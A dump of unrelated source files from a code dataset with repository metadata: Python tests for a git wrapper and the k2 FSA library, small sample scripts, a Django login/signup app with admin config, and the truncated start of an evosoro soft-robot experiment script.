# is the branch there? does it resolve to the HEAD's commit id?
assert r.repo.refs['refs/heads/test_branch'] == r.head().id
# should still be on master (no checkouts)
assert r.branch() == 'refs/heads/master'
# create new branch from commit
#
# we'll just use HEAD for simplicity's sake, but this time we're
# supplying a commit.
r.branch('test_branch2', ref=r.head().id)
# and do our checks again.
assert r.repo.refs['refs/heads/test_branch2'] == r.head().id
assert r.branch() == 'refs/heads/master'
def test_checkout(self):
"""Tests the `checkout` method"""
r = self._repo_with_commits(3)
# we'll checkout the parent of HEAD.
parent = r.object(r.head().parents[0])
assert type(parent) is Commit
def test_cmd(self):
"""Tests the `cmd` method"""
r = self._repo_with_commits()
# just try a few commands
assert r.cmd(['status'])
assert r.cmd(['log', '--pretty=oneline'])
def test_commit(self):
"""Tests the `commit` method"""
r = Repo.init(self.path, mkdir=True)
self._rand_file('spam')
r.add('spam')
c = r.commit(committer='GOB Bluth', message='Come on!')
# make sure the commit got set right
assert type(c) is Commit
assert c.author == 'GOB Bluth'
assert c.message == 'Come on!'
# the commit should be the same as the Repo.head
assert c == r.head()
def test_commits(self):
"""Tests the `commits` method"""
r = self._repo_with_commits(20)
# returns list of Commit objects
assert type(r.commits()) is list
assert type(r.commits()[0]) is Commit
# setting n=20 should get us 20 commits
assert len(r.commits(n=20)) == 20
# should accept a SHA
assert r.commits(r.head().id)
assert r.commits()[0] == r.head()
# should accept a branch name
assert r.commits('master')
assert r.commits()[0] == r.head()
# should accept a tag
assert r.commits('v1.0')
assert r.commits()[0] == r.head()
def test_constructor(self):
r1 = Repo.init(self.path, mkdir=True)
# verify that an existing repository can be initialized
r2 = Repo(r1.root)
# make sure it's a Repo object.
assert type(r2) is Repo
# a new repo should have no HEAD
try:
r2.head()
except NoHeadSet:
pass
def test_diff(self):
"""Tests the `diff` method"""
r = Repo.init(self.path, mkdir=True)
with open(os.path.join(r.root, 'test'), 'w') as fp:
fp.write('hello world')
r.add(all=True)
c1 = r.commit(committer='Test McGee', message='testing diff 1')
with open(os.path.join(r.root, 'test'), 'w') as fp:
fp.write('hello world!')
r.add(all=True)
c2 = r.commit(committer='Test McGee', message='testing diff 2')
expected = \
"""***
---
***************
*** 1 ****
! hello world!
--- 1 ----
! hello world"""
result = r.diff(c2.id, c1.id, 'test')
assert result == expected
def test_head(self):
"""Tests the `head` method"""
r = self._repo_with_commits(3)
head = r.head()
# make sure it returns a commit
assert type(head) is Commit
# in this case, the most recent commit should have the message:
assert head.message == 'Commit 2'
def test_init(self):
"""Tests the `init` method"""
# NOTE init refers not to __init__, but the classmethod for creating
# repositories. See test_constructor() for __init__.
r = Repo.init(self.path, mkdir=True)
# make sure it created something.
assert os.path.isdir(self.path)
# does the dir have a .git?
assert os.path.isdir(os.path.join(self.path, '.git'))
# make sure it returns a Repo object.
assert type(r) is Repo
def test_object(self):
"""Tests the `object` method"""
r = self._repo_with_commits()
tree = r.head().tree
commit = r.head().id
assert type(r.object(tree)) is Tree
assert type(r.object(commit)) is Commit
def test_tag(self):
"""Tests the `tag` method"""
r = self._repo_with_commits()
r.tag('test')
tags_dir = os.path.join(self.path, '.git', 'refs', 'tags')
assert 'test' in os.listdir(tags_dir)
def test_tree(self):
"""Tests the `tree` method"""
r = self._repo_with_commits()
# grab the tree from HEAD commit
t = r.tree(r.head().tree)
# is it a tree?
assert type(t) is Tree
try:
# giving it a commit id should fail
t = r.tree(r.head().id)
# in case it doesn't
assert type(t) is Tree
except NotTreeError:
pass
def _rand_file(self, path):
"""Write a SHA1 to a file."""
with open(os.path.join(self.path, path), 'w') as fp:
fp.write(str(uuid.uuid4()))
def _repo_with_commits(self, num_commits=1):
"""
Returns a repo with one or more commits, on master branch, with
a tag 'v1.0' that points to the last commit.
"""
r = Repo.init(self.path, mkdir=True)
for c in range(num_commits):
for i in range(4):
self._rand_file('spam-%d' % i)
# add the files/changes
r.add(all=True)
# commit the changes
r.commit(committer='Joe Sixpack', message='Commit %d' % c)
r.tag('v1.0')
return r
def test__expand_ref():
"""Tests the `_expand_ref` function."""
assert _expand_ref('heads', 'refs/heads/master') == 'refs/heads/master'
assert _expand_ref('heads', 'heads/master') == 'refs/heads/master'
assert _expand_ref('heads', 'master') == 'refs/heads/master'
if __name__ == '__main__':
unittest.main()
| [
"ndreynolds@gmail.com"
] | ndreynolds@gmail.com |
b96cdb37e177f57c6ce552c428b42910fcde0a6a | 92dd4dff04d4682967b60d6825482b9cca7e4796 | /python-samples/regex-match.py | f3a026fe0f8664167fab1f1e4d78c0aaf2c527ed | [] | no_license | vigneshmahesh/big-data-pipeline | 806868f959413d897e4a12bc2349b6ef0f1bcdfb | 928815a3983fce7500533ae5f468699c5e5fd4d3 | refs/heads/master | 2023-07-08T06:17:19.252901 | 2021-05-02T18:57:49 | 2021-05-02T18:57:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | #https://stackoverflow.com/questions/8888567/match-a-line-with-multiple-regex-using-python
import re
stri="hello hella hellb hellc helld"
regexList = ["hella", "hellb", "hellc"]
gotMatch = False
for regex in regexList:
s = re.search(regex,stri)
if s:
gotMatch = True
break
if gotMatch:
print("got match")
regexes= 'quick', 'brown', 'fox'
combinedRegex = re.compile('|'.join('(?:{0})'.format(x) for x in regexes))
lines = 'The quick brown fox jumps over the lazy dog', 'Lorem ipsum dolor sit amet', 'The lazy dog jumps over the fox'
for line in lines:
print(combinedRegex.findall(line))
| [
"noreply@github.com"
] | vigneshmahesh.noreply@github.com |
d329e0df524f7bf2d61bdfb4ee8f5c750109dcbf | ac74496d58e25060cc12bfd07f3fbcf3a790b575 | /bin/wheel | d62162fcda35324b1672ebf6978b50e65e4a1876 | [] | no_license | prdiction47/tryTen-Django-template | 2b8e18047bb16b97dc7f0c8be92015e3b47873bd | b78fcc45631c47194d613c9590c902bf09cf217f | refs/heads/master | 2022-02-06T11:55:21.526535 | 2019-07-20T20:01:43 | 2019-07-20T20:01:43 | 197,975,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | #!/home/p37/tryTen/activate/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.tool import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"noreply@github.com"
] | prdiction47.noreply@github.com | |
35fddb176546bcdc04b5f7168fe7656d9d16c1c5 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02675/s648199301.py | b63ed0e3bb4be52116a50e76ac3fe5f3864781f1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 332 | py | # -*- coding: utf-8 -*-
def main():
N = int(input())
case1 = [2, 4, 5, 7, 9]
case2 = [0, 1, 6, 8]
case3 = [3]
num = N % 10
if num in case1:
ans = 'hon'
elif num in case2:
ans = 'pon'
elif num in case3:
ans = 'bon'
print(ans)
if __name__ == "__main__":
main() | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fbb22d07d9835c8d6caf030863e2810b22a5435c | 43a8517e548eedbd8e5b74297207a794c63c5c0d | /examplePrintNameReverse.py | a797e4c755d3c64ea1348808c6fca356cf7aff2a | [] | no_license | JaleelSavoy/CS6.0001 | 7842bd22dad1f93ec18b3e60636f5acc0ba653b7 | ca9a0ae2afd18bcf476de1091a402341d053be51 | refs/heads/master | 2021-01-19T21:21:34.417329 | 2017-04-22T19:53:28 | 2017-04-22T19:53:28 | 88,646,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | #print name example
def printName(firstName, lastName, reverse = False):
if reverse:
return print(lastName + "," + firstName)
else:
return print(firstName, lastName)
# printName('Jaleel', 'Savoy', True)
#prints: Savoy, Jaleel
| [
"noreply@github.com"
] | JaleelSavoy.noreply@github.com |
2eceaf1c444d32ea302bb66c18aa3323860897b4 | 507103d591ed6993203db92fd8dffc992e8bcd5c | /k2/python/host/tests/fsa_equivalent_test.py | c328246c581ba7fda7ed9cc2746d8e53fc9b4e4a | [
"Apache-2.0"
] | permissive | k2-fsa/k2 | 6e661bd505f06583af779f4249bbb8ea87a0d662 | 2b2ac14b326d61d79d04e53fbd69b1ff6d630411 | refs/heads/master | 2023-09-03T11:57:13.505432 | 2023-08-23T21:58:26 | 2023-08-23T21:58:26 | 256,463,281 | 851 | 192 | Apache-2.0 | 2023-08-26T06:51:21 | 2020-04-17T09:44:05 | Cuda | UTF-8 | Python | false | false | 8,722 | py | #!/usr/bin/env python3
#
# Copyright 2020 Xiaomi Corporation (author: Haowen Qiu)
#
# See ../../../LICENSE for clarification regarding multiple authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run this single test, use
#
# ctest --verbose -R host_fsa_equivalent_test_py
#
import unittest
import torch
import k2host
class TestIsFsaEquivalent(unittest.TestCase):
def test_bad_case_1(self):
# just set arc.weight as 0 since we won't use it here
s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 5 0
3
'''
fsa_a = k2host.str_to_fsa(s_a)
s_b = r'''
0 1 1 0
0 2 2 0
1 2 3 0
3
'''
fsa_b = k2host.str_to_fsa(s_b)
self.assertFalse(k2host.is_rand_equivalent(fsa_a, fsa_b))
def test_bad_case_2(self):
s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 5 0
3
'''
fsa_a = k2host.str_to_fsa(s_a)
s_b = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 6 0
3
'''
fsa_b = k2host.str_to_fsa(s_b)
self.assertFalse(k2host.is_rand_equivalent(fsa_a, fsa_b, 100))
def test_good_case_1(self):
# both fsas will be empty after trimming
s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
3
'''
fsa_a = k2host.str_to_fsa(s_a)
s_b = r'''
0 1 1 0
0 2 2 0
3
'''
fsa_b = k2host.str_to_fsa(s_b)
self.assertTrue(k2host.is_rand_equivalent(fsa_a, fsa_b))
def test_good_case_2(self):
# same fsas
s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
1 3 4 0
2 3 5 0
3 4 -1 0
4
'''
fsa_a = k2host.str_to_fsa(s_a)
self.assertTrue(k2host.is_rand_equivalent(fsa_a, fsa_a))
def test_bad_case_2(self):
s_a = r'''
0 1 1 0
0 2 2 0
0 3 8 0
1 4 4 0
2 4 5 0
4 5 -1 0
5
'''
fsa_a = k2host.str_to_fsa(s_a)
s_b = r'''
0 2 1 0
0 1 2 0
0 3 9 0
1 4 5 0
2 4 4 0
4 5 -1 0
5
'''
fsa_b = k2host.str_to_fsa(s_b)
self.assertTrue(k2host.is_rand_equivalent(fsa_a, fsa_b))
class TestIsWfsaRandEquivalent(unittest.TestCase):
def setUp(self):
s_a = r'''
0 1 1 2
0 1 2 2
0 1 3 3
0 2 4 3
0 2 5 1
1 3 5 3
1 3 6 2
2 4 5 5
2 4 6 4
3 5 -1 1
4 5 -1 3
5
'''
self.fsa_a = k2host.str_to_fsa(s_a)
s_b = r'''
0 1 1 5
0 1 2 5
0 1 3 6
0 1 4 10
0 1 5 8
1 2 5 1
1 2 6 0
2 3 -1 0
3
'''
self.fsa_b = k2host.str_to_fsa(s_b)
s_c = r'''
0 1 1 5
0 1 2 5
0 1 3 6
0 1 4 10
0 1 5 9
1 2 5 1
1 2 6 0
2 3 -1 0
3
'''
self.fsa_c = k2host.str_to_fsa(s_c)
def test_max_weight(self):
self.assertTrue(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_b))
self.assertFalse(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_c))
def test_logsum_weight(self):
self.assertTrue(
k2host.is_rand_equivalent_logsum_weight(self.fsa_a, self.fsa_b))
self.assertFalse(
k2host.is_rand_equivalent_logsum_weight(self.fsa_a, self.fsa_c))
def test_with_beam(self):
self.assertTrue(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_b, 4.0))
self.assertFalse(
k2host.is_rand_equivalent_max_weight(self.fsa_a, self.fsa_c, 6.0))
class TestRandPath(unittest.TestCase):
def test_bad_case_1(self):
# empty fsa
array_size = k2host.IntArray2Size(0, 0)
fsa = k2host.Fsa.create_fsa_with_size(array_size)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertFalse(status)
self.assertTrue(k2host.is_empty(path))
self.assertTrue(arc_map.empty())
def test_bad_case_2(self):
# non-connected fsa
s_a = r'''
0 1 1 0
0 2 2 0
1 3 4 0
4
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertFalse(status)
self.assertTrue(k2host.is_empty(path))
self.assertTrue(arc_map.empty())
def test_good_case_1(self):
s_a = r'''
0 1 1 0
0 2 2 0
1 2 3 0
2 3 4 0
2 4 5 0
3 4 7 0
4 5 9 0
5 6 -1 0
6
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
status = rand_path.get_output(path)
self.assertTrue(status)
self.assertFalse(k2host.is_empty(path))
def test_good_case_2(self):
s_a = r'''
0 1 1 0
1 2 3 0
2 3 4 0
3 4 -1 0
4
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, False)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertTrue(status)
self.assertFalse(k2host.is_empty(path))
self.assertFalse(arc_map.empty())
expected_arc_indexes = torch.IntTensor([0, 1, 2, 3, 4, 4])
expected_arcs = torch.IntTensor([[0, 1, 1, 0], [1, 2, 3, 0],
[2, 3, 4, 0], [3, 4, -1, 0]])
expected_arc_map = torch.IntTensor([0, 1, 2, 3])
self.assertTrue(torch.equal(path.indexes, expected_arc_indexes))
self.assertTrue(torch.equal(path.data, expected_arcs))
self.assertTrue(torch.equal(arc_map.data, expected_arc_map))
def test_eps_arc_1(self):
s_a = r'''
0 1 1 0
0 2 0 0
1 2 3 0
2 3 0 0
2 4 5 0
3 4 7 0
4 5 9 0
5 6 -1 0
6
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, True)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertTrue(status)
self.assertFalse(k2host.is_empty(path))
self.assertFalse(arc_map.empty())
def test_eps_arc_2(self):
# there is no epsilon-free path
s_a = r'''
0 1 1 0
0 2 0 0
1 2 3 0
2 3 0 0
3 5 7 0
3 4 8 0
4 5 9 0
5 6 -1 0
6
'''
fsa = k2host.str_to_fsa(s_a)
rand_path = k2host.RandPath(fsa, True)
array_size = k2host.IntArray2Size()
rand_path.get_sizes(array_size)
path = k2host.Fsa.create_fsa_with_size(array_size)
arc_map = k2host.IntArray1.create_array_with_size(array_size.size2)
status = rand_path.get_output(path, arc_map)
self.assertFalse(status)
self.assertTrue(k2host.is_empty(path))
self.assertTrue(arc_map.empty())
if __name__ == '__main__':
unittest.main()
| [
"noreply@github.com"
] | k2-fsa.noreply@github.com |
96a1d7b58328b30fde41e93d4831caca9bf6fc36 | 9aaa39f200ee6a14d7d432ef6a3ee9795163ebed | /Algorithm/Python/146. LRU Cache.py | 12ae61d680fa056cf718b935addad161d26c1efe | [] | no_license | WuLC/LeetCode | 47e1c351852d86c64595a083e7818ecde4131cb3 | ee79d3437cf47b26a4bca0ec798dc54d7b623453 | refs/heads/master | 2023-07-07T18:29:29.110931 | 2023-07-02T04:31:00 | 2023-07-02T04:31:00 | 54,354,616 | 29 | 16 | null | null | null | null | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
# @Author: WuLC
# @Date: 2016-08-04 22:39:03
# @Last modified by: WuLC
# @Last Modified time: 2016-08-04 22:40:49
# @Email: liangchaowu5@gmail.com
class LRUCache(object):
def __init__(self, capacity):
"""
:type capacity: int
"""
self.capacity = capacity
self.cache = {}
self.keys = collections.deque()
self.exist_keys = set()
def get(self, key):
"""
:rtype: int
"""
if key in self.exist_keys:
self.keys.remove(key)
self.keys.append(key)
return self.cache[key]
return -1
def set(self, key, value):
"""
:type key: int
:type value: int
:rtype: nothing
"""
if key not in self.exist_keys:
self.exist_keys.add(key)
if len(self.keys) == self.capacity:
# remove the LRU element
old_key = self.keys.popleft()
self.exist_keys.remove(old_key)
del self.cache[old_key]
else:
self.keys.remove(key)
self.keys.append(key)
self.cache[key] = value
| [
"liangchaowu5@gmail.com"
] | liangchaowu5@gmail.com |
c375cdd6d18f800c809abea55b624924512fcece | 3b795f932efde9ad1c9fb84eeeb3d2b98bbccd2c | /generate_loader.py | cb4cc0604408aa9a6496225989db9d778c14840b | [] | no_license | pochmann/wca-api-go | f5c3927728001920ffeeb208b50d7bb8eb33de81 | 537f36840721244d4836f414c2f99019c99a9d2d | refs/heads/master | 2020-05-17T00:51:16.004945 | 2015-02-14T17:17:11 | 2015-02-14T17:17:11 | 30,503,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,929 | py | from glob import glob
from os.path import join
import re, subprocess
# Analyze the types in the .tsv files
types = []
for path in sorted(glob(join('data', 'WCA_export_*.tsv'))):
tablename = re.search('export_(.*).tsv', path).group(1)
typename = 'Wca' + re.sub('ies$', 'y', tablename).rstrip('s')
varname = 'wca' + tablename
with open(path, encoding='utf-8') as tf:
# Determine the column types (int or string)
fieldnames = next(tf).strip().split('\t')
fieldtypes = ['int32'] * len(fieldnames)
for row in tf:
for i, value in enumerate(row.strip().split('\t')):
if fieldtypes[i] == 'int32':
try:
int(value)
except:
fieldtypes[i] = 'str32'
types.append((typename, varname, fieldnames, fieldtypes, tablename))
# Generate the .go file
with open('wca-data.go', 'w') as f:
def p(*stuff):
print(*stuff, file=f)
# Output the package header
p('// This code was generated by generate_loader.py and should not be edited.')
p('package main')
p('import ("bufio"\n"os"\n"path"\n"strings")')
# Output the variable declarations
for typename, varname, fieldnames, fieldtypes, tablename in types:
p('var ' + varname + ' ' + '[]' + typename)
# Output the type declarations
for typename, varname, fieldnames, fieldtypes, tablename in types:
p('type %s struct {' % typename)
for fieldname, fieldtype in zip(fieldnames, fieldtypes):
p('{} {} `json:"{}"`'.format(fieldname[0].upper() + fieldname[1:], fieldtype, fieldname))
p('}')
# Output the loading code
p('func LoadWcaData() {')
p('var file *os.File')
p('var scanner *bufio.Scanner')
p('var ctr int')
for typename, varname, fieldnames, fieldtypes, tablename in types:
# Setup-code
p('''\n// Open the file, count the data rows, prepare the scanner
file, _ = os.Open(path.Join("data", "WCA_export_{tablename}.tsv"))
defer file.Close()
scanner = bufio.NewScanner(file)
ctr = -1
for scanner.Scan() {{
ctr++
}}
file.Seek(0, 0)
scanner = bufio.NewScanner(file)
scanner.Scan()
// Load the data
{varname} = make([]{typename}, ctr)
for i := range {varname} {{
scanner.Scan()
row := strings.Split(scanner.Text(), "\\t")'''.format(tablename=tablename, varname=varname, typename=typename))
# Code for loading the fields
p('x := &' + varname + '[i]')
i = 0
for fieldname, fieldtype in zip(fieldnames, fieldtypes):
p('x.{} = get{}(row[{}])'.format(fieldname[0].upper() + fieldname[1:], fieldtype.title(), i))
i += 1
# Close the loop
p('}')
p('}')
# Format the generated code
subprocess.call(['gofmt', '-w', 'wca-data.go'])
| [
"stefan.pochmann@gmail.com"
] | stefan.pochmann@gmail.com |
f86f346345b1e788b5612e8ac5f117bc6c0dbce1 | e168a4b9e7997b5266df4c1fe2afbaf0ed031fed | /url_shortener/profiles/forms.py | 470c5cd6344634922a1279b0c41660591cc5b23a | [] | no_license | AaronScruggs/urly-bird | 756eba26f21c66e78ed93bf6f936b50fb927aaef | a27314afb309de42230852fc2bd35416dece46d9 | refs/heads/master | 2021-01-22T01:18:59.907605 | 2016-04-05T07:01:53 | 2016-04-05T07:01:53 | 55,178,264 | 0 | 0 | null | 2016-03-31T19:45:02 | 2016-03-31T19:45:01 | null | UTF-8 | Python | false | false | 217 | py | from django import forms
from django.contrib.auth.models import User
from profiles.models import Profile
class ImageUpdateForm(forms.ModelForm):
class Meta:
model = Profile
fields = ("image",)
| [
"aarondscruggs@gmail.com"
] | aarondscruggs@gmail.com |
36c5318154387ad099df3c4c0100ceffc7f79f78 | 4b486da34cc3c0c6492eb0c183757c5a6903490e | /apps/organization/adminx.py | f1dd73b85b15a0c499ee46241b94d6882aabcd65 | [] | no_license | xxqyjk/MxOnline | 6c48e2bf807d6770efef2870866a7897ef5f5d69 | a4d147244d5603d145636671ab246ca88490a0fa | refs/heads/master | 2020-03-20T12:35:41.657651 | 2018-06-19T03:45:54 | 2018-06-19T03:45:54 | 137,435,213 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | #_*_ coding: utf-8 _*_
__author__ = 'cherryban'
__date__ = '2018/6/19 9:24'
import xadmin
from .models import CityDict, CourseOrg, Teacher
class CityDictAdmin(object):
list_display = ['name', 'desc', 'add_time']
search_fields = ['name', 'desc']
list_filter = ['name', 'desc', 'add_time']
class CourseOrgAdmin(object):
list_display = ['name', 'desc', 'click_nums', 'fav_nums', 'image', 'address', 'city', 'add_time']
search_fields = ['name', 'desc', 'click_nums', 'fav_nums', 'image', 'address', 'city']
list_filter = ['name', 'desc', 'click_nums', 'fav_nums', 'image', 'address', 'city', 'add_time']
class TeacherAdmin(object):
list_display = ['org', 'name', 'work_years', 'work_company', 'work_position', 'points','click_nums', 'fav_nums', 'add_time']
search_fields = ['org', 'name', 'work_years', 'work_company', 'work_position', 'points','click_nums', 'fav_nums']
list_filter = ['org', 'name', 'work_years', 'work_company', 'work_position', 'points','click_nums', 'fav_nums', 'add_time']
xadmin.site.register(CityDict, CityDictAdmin)
xadmin.site.register(CourseOrg, CourseOrgAdmin)
xadmin.site.register(Teacher, TeacherAdmin) | [
"xxqyjk@163.com"
] | xxqyjk@163.com |
a74b58b3e5974f4098f7a4932dfa112f9fedbc7e | 19ddab74600f71700a6b693281d0180d5271f295 | /程序员面试金典/01_04_回文排列.py | bc02963092c9dc8e4d739287a6103fd74aad53ce | [] | no_license | zhulf0804/Coding.Python | 4d55a430da1a8077c81feba65c13ac654aaf094a | 46ab03e23d15ebd5434ef4dd5ae99130000b00a5 | refs/heads/master | 2022-09-14T18:40:59.880941 | 2022-08-20T08:25:51 | 2022-08-20T08:25:51 | 213,113,482 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | class Solution:
def canPermutePalindrome(self, s: str) -> bool:
d = {}
for item in s:
d[item] = d.get(item, 0) + 1
is_odd = False
for k, v in d.items():
if v & 1 == 1:
if is_odd:
return False
is_odd = True
return True | [
"zhulf0804@gmail.com"
] | zhulf0804@gmail.com |
42ca502857139d862fd33e501566af85364c52ba | fb509a40f884456371435b633242f29af789174d | /account/views.py | 83299a0ba0a4296954cc8ed0fd0cea5906a57e80 | [] | no_license | dorikoirony/django_ph | 64c7b17190c8dfdd165c678fc43c075dc032858e | 49067146ffa2d9e410de35fc62f2a59cb74a31ea | refs/heads/master | 2020-05-04T19:44:52.227154 | 2019-04-15T08:25:03 | 2019-04-15T08:25:03 | 179,406,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,487 | py | from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import auth
# Create your views here.
def signup(request):
if request.method == 'GET':
return render(request,'signup.html')
elif request.method == 'POST':
user_name = request.POST['用户名']
password1 = request.POST['密码']
password2 = request.POST['确认密码']
try:
User.objects.get(username = user_name)
return render(request, 'signup.html',{'用户名错误':'存在该账户'})
except User.DoesNotExist:
if password1==password2:
User.objects.create_user(username=user_name,password=password1)
return redirect('主页')
else:
return render(request,'signup.html',{'密码错误':'两次密码不一致!'})
def login(request):
if request.method == 'GET':
return render(request,'login.html')
elif request.method == 'POST':
user_name = request.POST['用户名']
pass_word = request.POST['密码']
user = auth.authenticate(username=user_name,password=pass_word)
if user:
auth.login(request,user)
return redirect('主页')
else:
return render(request,'login.html',{'登录错误':'用户名或密码错误'})
def logout(request):
if request.method == 'POST':
auth.logout(request)
return redirect('主页') | [
"1033188854@qq.com"
] | 1033188854@qq.com |
622db43d8423045eb3047bcc7e89c91ca043dd42 | f25429ea099ba1d930553ebcfd3f61ec1383141a | /historia/migrations/0008_auto_20210629_1800.py | 5c473c035ede96037a4ccee80a29fa7d8495ffb1 | [] | no_license | MoacyrFMoreira/dmtable | 3da49cd0c58e334abb8f00ec2c2a3e7d87fd7208 | 8b2e41125df00a9ecd365be74f4fcacd225bbce4 | refs/heads/main | 2023-06-29T07:05:44.121912 | 2021-07-24T04:45:22 | 2021-07-24T04:45:22 | 388,999,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | # Generated by Django 3.1.3 on 2021-06-29 21:00
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('historia', '0007_auto_20210629_1354'),
]
operations = [
migrations.AlterField(
model_name='post',
name='date',
field=models.DateTimeField(default=datetime.datetime(2021, 6, 29, 18, 0, 17, 945116)),
),
]
| [
"mmoreira@accedian.com"
] | mmoreira@accedian.com |
120016fa3909ffc968939614e61fd3313f336cfe | 96f5d1d1cc1fc92bd11c4288246245722a7fec20 | /College/urls.py | c6064dc3cd002341ea83f836f5e19d76f754d261 | [] | no_license | vagdevik/Django-WishList | 10307c168a1d9d3907fcb20386e2b1a816898892 | 49d0fe3f442f34f67242a7958e6b128df7d6fb31 | refs/heads/master | 2021-05-07T14:17:29.037822 | 2017-11-07T07:49:51 | 2017-11-07T07:49:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | """College URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from Book import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^Books/',include('Book.urls')),
]
| [
"vagdevi.k15@iiits.in"
] | vagdevi.k15@iiits.in |
e2ebb7364de4eccca18cc5bce6a33b392ac1e28a | 7fbb087f862f0a1351454706dee139e112addff3 | /evosoro/exp/RSS_5D_Two_Diag_Legs_Control.py | 4782b44d2201bd25b13af1d9b2175f558c6c2fc0 | [] | no_license | fagan2888/2019-RSS | 5e21b5ea992c82620d5d7a32200a0a2243057fda | 4801255d7cff228772532732e18d7e7d458b81f1 | refs/heads/master | 2022-06-05T05:09:03.588134 | 2020-04-30T19:56:14 | 2020-04-30T19:56:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,706 | py | import random
import os
import sys
import numpy as np
import subprocess as sub
from evosoro.base import Sim, Env, ObjectiveDict
from evosoro.networks import DirectEncoding, CPPN
from evosoro.softbot import Genotype, Phenotype, Population
from evosoro.tools.algorithms import ParetoOptimization
from evosoro.tools.checkpointing import continue_from_checkpoint
from evosoro.tools.utils import quadruped
SIMULATOR_DIR = "../../_voxcad"
PICKLE_DIR = "../pretrained/quadrupeds"
SEED = int(sys.argv[1])
MAX_TIME = float(sys.argv[2])
# SEED = 1
# MAX_TIME = 1
PICKLE_GEN = 1500
PICKLE = "{0}/run_{1}/Gen_{2}.pickle".format(PICKLE_DIR, (SEED-1) % 5 + 1, PICKLE_GEN)
QUAD_SIZE = (6, 6, 5)
IND_SIZE = QUAD_SIZE
STIFFNESS = 1e7
POP_SIZE = 50
MAX_GENS = 5000
NUM_RANDOM_INDS = 1
INIT_TIME = 0.4
SIM_TIME = 4 + INIT_TIME # includes init time
TEMP_AMP = 39.4714242553 # 50% volumetric change with temp_base=25: (1+0.01*(39.4714242553-25))**3-1=0.5
FREQ = 5.0
DT_FRAC = 0.9
MIN_TEMP_FACT = 0.25
TIME_TO_TRY_AGAIN = 30
MAX_EVAL_TIME = 75
SAVE_VXA_EVERY = MAX_GENS+1 # never
CHECKPOINT_EVERY = 1 # gen(s)
FITNESS_TAG = "normAbsoluteDisplacement"
RUN_DIR = "run_{}".format(SEED)
RUN_NAME = "RegenQuad"
# copy the simulator executable into the working directory
